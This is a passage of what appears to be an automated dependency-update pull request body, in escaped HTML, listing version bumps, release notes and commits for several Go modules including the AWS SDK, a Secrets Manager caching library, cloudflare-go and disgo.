events\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.47.0...v1.54.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go` from 1.50.36 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.7 (2025-04-22)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/s3/s3manager\u003c/code\u003e: Abort multipart download if object is modified during download\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/4986\"\u003e4986\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.6 (2025-01-15)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix broken printf for go1.24\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.5 (2024-07-30)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/appstream\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eAdded support for Red Hat Enterprise Linux 8 on Amazon AppStream 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/autoscaling\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eIncrease the length limit for VPCZoneIdentifier from 2047 to 5000\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/codepipeline\u003c/code\u003e: Updates service API, documentation, and paginators\n\u003cul\u003e\n\u003cli\u003eAWS CodePipeline V2 type pipelines now support stage level conditions to enable development teams to safely release changes that meet quality and compliance requirements.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eDoc only update for changes to deletion API.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticloadbalancing\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/eventbridge\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/logs\u003c/code\u003e: Updates service API\n\u003cul\u003e\n\u003cli\u003eAdd v2 smoke tests and smithy smokeTests trait for SDK testing.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/models.lex.v2\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/rolesanywhere\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/tnb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/workspaces\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRemoving multi-session as it isn't supported for pools\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.4 (2024-07-29)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRenaming full service name as it appears in developer documentation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/memorydb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/163aada692ed32951f979aacf452ded4c03b8a7c\"\u003e\u003ccode\u003e163aada\u003c/code\u003e\u003c/a\u003e release v1.55.7 (2025-04-22) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/5346\"\u003e#5346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/9eb2bfd2f949fc81b96cee6b5aae6d9b84abea75\"\u003e\u003ccode\u003e9eb2bfd\u003c/code\u003e\u003c/a\u003e Abort multi part download if the object is modified during download\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/8d203ccff393340d080be0417d091cc60354449b\"\u003e\u003ccode\u003e8d203cc\u003c/code\u003e\u003c/a\u003e Update bug-report.yml\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.50.36...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-secretsmanager-caching-go` from 1.1.3 to 1.2.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-secretsmanager-caching-go/releases\"\u003egithub.com/aws/aws-secretsmanager-caching-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.2.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdding refreshNow functionality to the cache by \u003ca href=\"https://github.com/wlewis4321\"\u003e\u003ccode\u003e@​wlewis4321\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-secretsmanager-caching-go/pull/77\"\u003eaws/aws-secretsmanager-caching-go#77\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/net from 0.18.0 to 0.23.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-secretsmanager-caching-go/pull/78\"\u003eaws/aws-secretsmanager-caching-go#78\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/wlewis4321\"\u003e\u003ccode\u003e@​wlewis4321\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-secretsmanager-caching-go/pull/77\"\u003eaws/aws-secretsmanager-caching-go#77\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-secretsmanager-caching-go/pull/78\"\u003eaws/aws-secretsmanager-caching-go#78\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-secretsmanager-caching-go/compare/v1.1.3...v1.2.0\"\u003ehttps://github.com/aws/aws-secretsmanager-caching-go/compare/v1.1.3...v1.2.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-secretsmanager-caching-go/commit/74e0c73356dda04a16b9c09d4983104c115f9b77\"\u003e\u003ccode\u003e74e0c73\u003c/code\u003e\u003c/a\u003e Bump golang.org/x/net from 0.18.0 to 0.23.0 (\u003ca href=\"https://redirect.github.com/aws/aws-secretsmanager-caching-go/issues/78\"\u003e#78\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-secretsmanager-caching-go/commit/acd923a19735cba44fadc0b1bae1a50d4f539b77\"\u003e\u003ccode\u003eacd923a\u003c/code\u003e\u003c/a\u003e Adding refreshNow functionality to the cache (\u003ca href=\"https://redirect.github.com/aws/aws-secretsmanager-caching-go/issues/77\"\u003e#77\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-secretsmanager-caching-go/commit/0a82475bedffd5ce14f2231498cba2b59b3b261a\"\u003e\u003ccode\u003e0a82475\u003c/code\u003e\u003c/a\u003e Update CODEOWNERS\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-secretsmanager-caching-go/compare/v1.1.3...v1.2.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/cloudflare/cloudflare-go` from 0.104.0 to 0.116.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/cloudflare/cloudflare-go/releases\"\u003egithub.com/cloudflare/cloudflare-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.116.0\u003c/h2\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eaccess_service_tokens: Added graceful rotation support for client secrets (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/4189\"\u003e#4189\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.115.0\u003c/h2\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eaccess_service_token: add \u003ccode\u003elast_seen_at\u003c/code\u003e field (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3838\"\u003e#3838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edns: Add settings to DNSRecord (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3670\"\u003e#3670\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eteams_rules: add support for biso admin controls v2 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3848\"\u003e#3848\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eDEPENDENCIES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edeps: bumps dependabot/fetch-metadata from 2.2.0 to 2.3.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3865\"\u003e#3865\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: bumps github.com/go-git/go-git/v5 from 5.11.0 to 5.13.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3869\"\u003e#3869\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: bumps github.com/goccy/go-json from 0.10.4 to 0.10.5 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3870\"\u003e#3870\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: bumps golang.org/x/net from 0.25.0 to 0.33.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3868\"\u003e#3868\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.114.0\u003c/h2\u003e\n\u003cp\u003eNOTES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erulesets: remove \u003ccode\u003ehttp_request_sbfm\u003c/code\u003e phase (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3824\"\u003e#3824\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eworkers: The \u003ccode\u003eplacement_mode\u003c/code\u003e attribute in script upload responses has been deprecated. The new attribute \u003ccode\u003eplacement.mode\u003c/code\u003e should be used instead. (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3825\"\u003e#3825\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eaccess_application: added more fields to private destinations (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3829\"\u003e#3829\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eteams_rules: add support for \u003ccode\u003eresolve_dns_internally\u003c/code\u003e settings on dns_resolver rules (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3779\"\u003e#3779\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ewaiting_room: add waiting room turnstile integration fields (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3764\"\u003e#3764\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eworkers: Add new \u003ccode\u003eplacement\u003c/code\u003e attribute object in script upload responses. It contains the \u003ccode\u003emode\u003c/code\u003e and \u003ccode\u003estatus\u003c/code\u003e attributes. (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3825\"\u003e#3825\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eDEPENDENCIES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edeps: bumps golang.org/x/net from 0.33.0 to 0.34.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3796\"\u003e#3796\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: bumps golang.org/x/time from 0.8.0 to 0.9.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3783\"\u003e#3783\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.113.0\u003c/h2\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eteams_location: make location parameters optional (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3758\"\u003e#3758\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eDEPENDENCIES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edeps: bumps golang.org/x/net from 0.32.0 to 0.33.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3756\"\u003e#3756\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.112.0\u003c/h2\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eaccess_application: support Access service token + multi-valued authentication for SCIM provisioning (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3708\"\u003e#3708\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/cloudflare/cloudflare-go/blob/v0.116.0/CHANGELOG.md\"\u003egithub.com/cloudflare/cloudflare-go's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.116.0 (September 5th, 2025)\u003c/h2\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eaccess_service_tokens: Added graceful rotation support for client secrets (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/4189\"\u003e#4189\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.115.0 (January 29th, 2025)\u003c/h2\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eaccess_service_token: add \u003ccode\u003elast_seen_at\u003c/code\u003e field (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3838\"\u003e#3838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edns: Add settings to DNSRecord (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3670\"\u003e#3670\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eteams_rules: add support for biso admin controls v2 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3848\"\u003e#3848\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eDEPENDENCIES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edeps: bumps dependabot/fetch-metadata from 2.2.0 to 2.3.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3865\"\u003e#3865\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: bumps github.com/go-git/go-git/v5 from 5.11.0 to 5.13.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3869\"\u003e#3869\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: bumps github.com/goccy/go-json from 0.10.4 to 0.10.5 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3870\"\u003e#3870\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: bumps golang.org/x/net from 0.25.0 to 0.33.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3868\"\u003e#3868\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.114.0 (January 15th, 2025)\u003c/h2\u003e\n\u003cp\u003eNOTES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erulesets: remove \u003ccode\u003ehttp_request_sbfm\u003c/code\u003e phase (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3824\"\u003e#3824\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eworkers: The \u003ccode\u003eplacement_mode\u003c/code\u003e attribute in script upload responses has been deprecated. The new attribute \u003ccode\u003eplacement.mode\u003c/code\u003e should be used instead. (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3825\"\u003e#3825\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eaccess_application: added more fields to private destinations (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3829\"\u003e#3829\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eteams_rules: add support for \u003ccode\u003eresolve_dns_internally\u003c/code\u003e settings on dns_resolver rules (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3779\"\u003e#3779\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ewaiting_room: add waiting room turnstile integration fields (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3764\"\u003e#3764\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eworkers: Add new \u003ccode\u003eplacement\u003c/code\u003e attribute object in script upload responses. It contains the \u003ccode\u003emode\u003c/code\u003e and \u003ccode\u003estatus\u003c/code\u003e attributes. (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3825\"\u003e#3825\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eDEPENDENCIES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edeps: bumps golang.org/x/net from 0.33.0 to 0.34.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3796\"\u003e#3796\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: bumps golang.org/x/time from 0.8.0 to 0.9.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3783\"\u003e#3783\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.113.0 (January 1st, 2025)\u003c/h2\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eteams_location: make location parameters optional (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3758\"\u003e#3758\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eDEPENDENCIES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edeps: bumps golang.org/x/net from 0.32.0 to 0.33.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3756\"\u003e#3756\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cloudflare/cloudflare-go/commit/1eda786b473df9b16e8c229b44fbdca3a6c8d3e7\"\u003e\u003ccode\u003e1eda786\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.md\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cloudflare/cloudflare-go/commit/13174364900eb1293ec6f746ffba1af845193ad2\"\u003e\u003ccode\u003e1317436\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.md for \u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/4189\"\u003e#4189\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cloudflare/cloudflare-go/commit/fd41d6b3ff51b5831c6fba3a87c8f73a3081d0ad\"\u003e\u003ccode\u003efd41d6b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/4189\"\u003e#4189\u003c/a\u003e from GreenStage/aholland/client_secret_version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cloudflare/cloudflare-go/commit/8f93e33214db6db82f34bb4a744e1818c9d6f359\"\u003e\u003ccode\u003e8f93e33\u003c/code\u003e\u003c/a\u003e Bump golangci/golangci-lint-action to fix CI errors\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cloudflare/cloudflare-go/commit/d5bd4b95393c4e156d04c66fd0c82f7de1b3ce79\"\u003e\u003ccode\u003ed5bd4b9\u003c/code\u003e\u003c/a\u003e Add graceful rotation support for client secrets\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cloudflare/cloudflare-go/commit/57714bfbdeea095ec27f4b9bafe65bda4f178d96\"\u003e\u003ccode\u003e57714bf\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.md\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cloudflare/cloudflare-go/commit/b063df7c17d6ddb691e9198e487fe725cd6fd224\"\u003e\u003ccode\u003eb063df7\u003c/code\u003e\u003c/a\u003e generate changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cloudflare/cloudflare-go/commit/46140a1e1a7ed8615e87dc25bcac9025276aefc8\"\u003e\u003ccode\u003e46140a1\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3870\"\u003e#3870\u003c/a\u003e from cloudflare/dependabot/go_modules/github.com/goc...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cloudflare/cloudflare-go/commit/3abb34b01bf318bebc80e53d332c8e2c4f6b5e74\"\u003e\u003ccode\u003e3abb34b\u003c/code\u003e\u003c/a\u003e add CHANGELOG for \u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3870\"\u003e#3870\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cloudflare/cloudflare-go/commit/c726fce143d9a98280750d2da51fbc47c5f21edd\"\u003e\u003ccode\u003ec726fce\u003c/code\u003e\u003c/a\u003e Bump github.com/goccy/go-json from 0.10.4 to 0.10.5\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/cloudflare/cloudflare-go/compare/v0.104.0...v0.116.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/disgoorg/disgo` from 0.18.5 to 0.19.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/disgoorg/disgo/releases\"\u003egithub.com/disgoorg/disgo's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.19.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003echore: use separate struct for Invite roles by \u003ca href=\"https://github.com/yokkkoso\"\u003e\u003ccode\u003e@​yokkkoso\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/522\"\u003edisgoorg/disgo#522\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eremove null-padded from udp conn address by \u003ca href=\"https://github.com/iishabakaev\"\u003e\u003ccode\u003e@​iishabakaev\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/521\"\u003edisgoorg/disgo#521\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(voice): gateway bail on non-retriable close codes by \u003ca href=\"https://github.com/MohmmedAshraf\"\u003e\u003ccode\u003e@​MohmmedAshraf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/523\"\u003edisgoorg/disgo#523\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(voice): add missing voice gateway close event codes by \u003ca href=\"https://github.com/kshitijanurag\"\u003e\u003ccode\u003e@​kshitijanurag\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/524\"\u003edisgoorg/disgo#524\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat(message): shared client themes by \u003ca href=\"https://github.com/kshitijanurag\"\u003e\u003ccode\u003e@​kshitijanurag\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/526\"\u003edisgoorg/disgo#526\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add \u003ccode\u003eBaseThemeTypeUnset\u003c/code\u003e to \u003ccode\u003eBaseThemeType\u003c/code\u003e enum by \u003ca href=\"https://github.com/kshitijanurag\"\u003e\u003ccode\u003e@​kshitijanurag\u003c/code\u003e\u003c/a\u003e in \u003ca 